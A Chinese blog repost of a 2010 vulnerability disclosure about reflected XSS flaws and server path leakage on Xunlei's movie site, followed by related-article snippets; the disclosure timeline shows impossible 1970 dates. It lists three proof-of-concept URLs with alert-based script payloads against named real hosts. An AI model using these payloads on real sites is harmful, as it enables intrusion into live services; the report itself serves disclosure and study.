迅雷的xss漏洞和敏感信息泄露

最新推荐文章于 2024-12-22 11:20:42 发布
原创 最新推荐文章于 2024-12-22 11:20:42 发布 · 408 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #安全 #hack #网络安全 #wooyun

这篇博客揭露了迅雷电影网站在2010年7月存在多个XSS漏洞,同时导致服务器敏感信息泄露的问题。漏洞细节在不同时间阶段逐步对白帽子和公众公开。漏洞证明包括三个具体的URL,展示如何触发XSS攻击并显示警告信息。

漏洞详情

披露状态:

2010-07-23: 细节已通知厂商并且等待厂商处理中
1970-01-01: 厂商已经确认,细节仅向厂商公开
1970-01-11: 细节向核心白帽子及相关领域专家公开
1970-01-21: 细节向普通白帽子公开
1970-01-31: 细节向实习白帽子公开
2010-08-22: 细节向公众公开

简要描述:

几个xss漏洞和敏感信息泄露

详细说明:

几个xss,顺便爆出了服务器敏感信息
Warning: Invalid argument supplied for foreach() in /data/vhosts/xunlei.com/movie/public_html/movie_search_new.php on line 1309
Warning: Invalid argument supplied for foreach() in /data/vhosts/xunlei.com/movie/public_html/movie_search_new.php on line 1327

漏洞证明:

http://movies.xunlei.com/movie_search.php?type=xss%27;%22%3Cscript%3Ealert%28188%29%3C/script%3E&keyword=%D2%EC%D7%E5%D6%D5%BD%E1%D5%BD
http://movies.xunlei.com/movie_search.php?type=search&keyword=%3C/title%3E%3Cscript%3Ealert%28/anyunix/%29%3C/script%3E
http://movie.xunlei.com/type,area/a%22%3E%3CBODY%20ONLOAD=alert%28188%29%3E,1/

Sword-heart
关注
跨站脚本攻击(XSS)进阶
悦分享
07-08 524
跨站脚本攻击(XSS)是客户端脚本安全中的头号大敌。OWASP TOP 10威胁多次把XSS列在榜首。跨站脚本攻击,英文全称是 Cross Site Script,本来缩写是 CS S,但是为了层叠样式表(Cascading Style Sheet,CSS)有所区别,所以在安全领域叫做“XSS”。XSS攻击,通常指黑客通过“HTML注入”篡改了网页,插入了恶意的脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。在一开始,这种攻击的演示案例是跨域的,所以叫做“跨站脚本”。
[网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门蚁剑提权示例(一)
杨秀璋的专栏
04-10 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可能利用此漏洞远程无需用户验证,执行恶意代码并获取机器的完全控制。本文将详细讲解Vulnhub靶机渗透的环境搭建JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。由于hack the box速度堪忧,作者选择了Vulnhub靶场,希望深入分析来
19楼持久型XSS敏感信息泄露
swordheart的博客
04-18 4797
漏洞详情 披露状态: 2010-07-30: 细节已通知厂商并且等待厂商处理中 2010-08-02: 厂商已经确认,细节仅向厂商公开 2010-08-12: 细节向核心白帽子及相关领域专家公开 2010-08-22: 细节向普通白帽子公开 2010-09-01: 细节向实习白帽子公开 2010-08-30: 细节向公众公开 简要描述: XSS位置较明显,一些地方会泄露sql数据信息 详细说明: 个人空间DIY时可以使用expression,IE6、IE7测试通过 漏洞证明: http://
迅雷最新版本存在严重的远程拒绝服务漏洞(0day)
weixin_33905756的博客
04-24 280
转载的摘要:迅雷是由Thunder Networking公司开发的一个下载软件,在中国有着非常广泛的用户.迅雷5的ThunderAgent_005.dll中注册了一个activex 控件,当Internet Explorer调用他的某些方法时,将会造成整数溢出,成功利用将造成Internet Explorer崩溃.From:[url]http://www.ph4nt0m.or...
xxs漏洞危害_浅谈XSS漏洞web中所造成的危害
weixin_31243809的博客
12-24 1201
2012-1-17 13:37 Tuesday浅谈XSS漏洞web中所造成的危害最近不知道为什么,可能是巧合吧,我接触到了不少关于XSS的东西,这其中也是阅读了一些的关于XSS的文章,由此一来,对XSS也有了一定的认识思路,当然,这都是以站在巨人的肩膀上为基础的。在不少人看来,XSS所可能造成的危害程度并不是很大,或者说,一个XSS漏洞的可利用价值并不高,一无非也就是弹框加收集cookie而已...
【惊爆】用迅雷的童鞋要注意了,不要泄露个人隐私,本人的最新发现
weixin_34307464的博客
10-06 1571
今天晚上正无聊的时候,突然发现桌面的网络邻居名字变成了迅雷邻居?纳闷!~打开看看吓了一大跳开始只是觉得有点吃惊,赶紧发了条微博 经过...
迅雷前CEO被立案侦查最新进展:窃取服务器数据怎么破?
云盒子企业云盘官方账号,17年专注文档安全
10-13 515
迅雷前CEO陈磊涉嫌非法侵占公司财务被立案侦查,这一事件闹得沸沸扬扬,从4月份被罢免职务到现在,相关非法行为被爆出,最新消息是:陈磊被免职当天前司机进入公司机房盗取数据未遂!这是怎么回事? 4月2号,也就是陈磊被免职的当天,他的司机姚某借机邀请了迅雷全资子公司网心科技的个别安保人员吃饭,在取得安保人员信任之后,借故以受领导之托去公司机房办事为由,利用安保人员的门禁卡进入网心公司机房,试图将5块1T的硬盘插入网心公司服务器,盗取公司数据源码。 后因拷贝时间较长,到门口抽烟被发现后潜逃,这样的猪队友,
2021 HW 漏洞清单汇总 ( 附 poc )
gjgj的博客
04-23 1万+
2021 HW 漏洞清单汇总 2021.4.8——4.22 披露时间 涉及商家/产品漏洞描述 2021/04/08启明星辰天清汉马USG防火墙存在逻辑缺陷漏洞(历史漏洞) CNVD-2021-17391 启明星辰 天清汉马USG防火墙 逻辑缺陷漏洞 CNVD-2021-12793 2021/04/08禅道项目管理软件11.6禅道 11.6 sql注...
20年时候收集的一些信息安全岗面试题
课嗨教育的专栏
05-02 8429
目录 面试一 面试二 面试三 更多资料可:渗透测试基础课-课程进度_课嗨教育的博客-优快云博客 面试一 个人介绍: 自我介绍要点:不要用长逻辑句,短小精悍 控制在3-4分钟 1、自我介绍姓名年龄哪里人学校情况不是重点,作为顺滑开场 2、经历与技能啥时候开始学web攻防,实习经历(神舟,做了什么;尚然,做了什么),让人家清楚历史引入技术主题,挑重点 3、业绩/成绩: 研究类:freebuff SRC I春秋...
第十七届山东省职业院校技能大赛 高职组“信息安全管理与评估”赛项任务书(样题)
最新发布
we_solo的博客
12-22 1084
第十七届山东省职业院校技能大赛 高职组“信息安全管理与评估”赛项任务书(样题)
卧槽!迅雷的代码竟然被扒了精光!
Java和Android架构
03-30 512
上一篇:闲鱼面试官:Thread.sleep(0) 到底有什么用?我:有点懵~来源:juejin.im/post/6890344584078721031背景之前扒过飞书的源码,从代码设计架构层面里里外外学习一把,飞书还是挺 “大方” 的,源码在客户端网页端都一览无余,不过好像新版本已经看不到了。相关的文章由于在内网技术论坛发过了不便于再发出来(泄露内部资料会被查水表的)...
Web迅雷(xunlei)0day漏洞曝光
weixin_30511107的博客
06-01 211
一、事件分析:   DSW Lab AVERT小组监测到一个高度危险讯雷漏洞被曝光,该漏洞发生在Web迅雷...
网站安全渗透之敏感信息泄露XSS跨站脚本、越权访问
03-02 761
网站渗透安全问题主要包括:敏感信息泄露XSS漏洞攻击、越权访问、SQL注入、明文传输、后台泄漏漏洞、设计缺陷/逻辑错误、上传漏洞、CSRF跨站请求伪造
跨站脚本攻击漏洞XSS):基础知识防御策略
weixin_43263566的博客
01-16 1万+
跨站脚本攻击漏洞-基础篇
XSS漏洞分类及危害
热门推荐
lay_loge的博客
05-22 3万+
常见的XSS漏洞分为存储型、反射型、DOM型三种。 (1)反射型XSS 用户在请求某条URL地址的时候,会携带一部分数据。当客户端进行访问某条链接时,攻击者可以将恶意代码植入到URL,如果服务端未对URL携带的参数做判断或者过滤处理,直接返回响应页面,那么XSS攻击代码就会一起被传输到用户的浏览器,从而触发反射型XSS。例如,当用户进行搜索时,返回结果通常会包括用户原始的搜索内容,如果攻击者精心构...
XSS漏洞总结之小试牛刀
MX的博客
06-20 2万+
一:XSS漏洞总结 1>:简介 XSS是跨站脚本攻击,属于被动式的攻击。XSS指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意的特殊目的。 2>: 分类及危害 XSS分类: 反射型: 非持久性XSS攻击,当用户访问已被插入攻击代码的链接时,攻击代码执行,完成该次攻击。 存
XSS后台敏感操作(审计思路实现)
gl620321的博客
08-10 1075
一、XSS后台敏感操作问题的审计 1、XSS是什么? XSS表示Cross Site Scripting(跨站脚本攻击),它与SQL注入攻击中以以SQL语句作为用户输入,从而达到查询/修改/删除数据的目的,二在XSS攻击中,通过插入恶意脚本,实现对用户浏览器的控制。 2、XSS攻击可以分成两种类型 非持久性攻击:非持久性XSS攻击是一次性的,仅对当次的页面访问产生影响 持久性攻击:持久性XSS攻...
预防XSS攻击,(参数/响应值)特殊字符过滤
weixin_34200628的博客
12-17 1643
一、什么是XSS攻击 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如同源策略(same origin policy)。这种类型的漏洞由于被黑客用来编写危害性更大的网络钓鱼(Phi...
全面解析XSS漏洞扫描工具与防护策略
- 与XSS相关的法规与标准,如PCI DSS(支付卡行业数据安全标准)GDPR(欧盟通用数据保护条例),要求企业采取适当措施防止XSS攻击,以保护用户的个人信息交易数据的安全。 通过上述对XSS漏洞扫描的详细解析,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值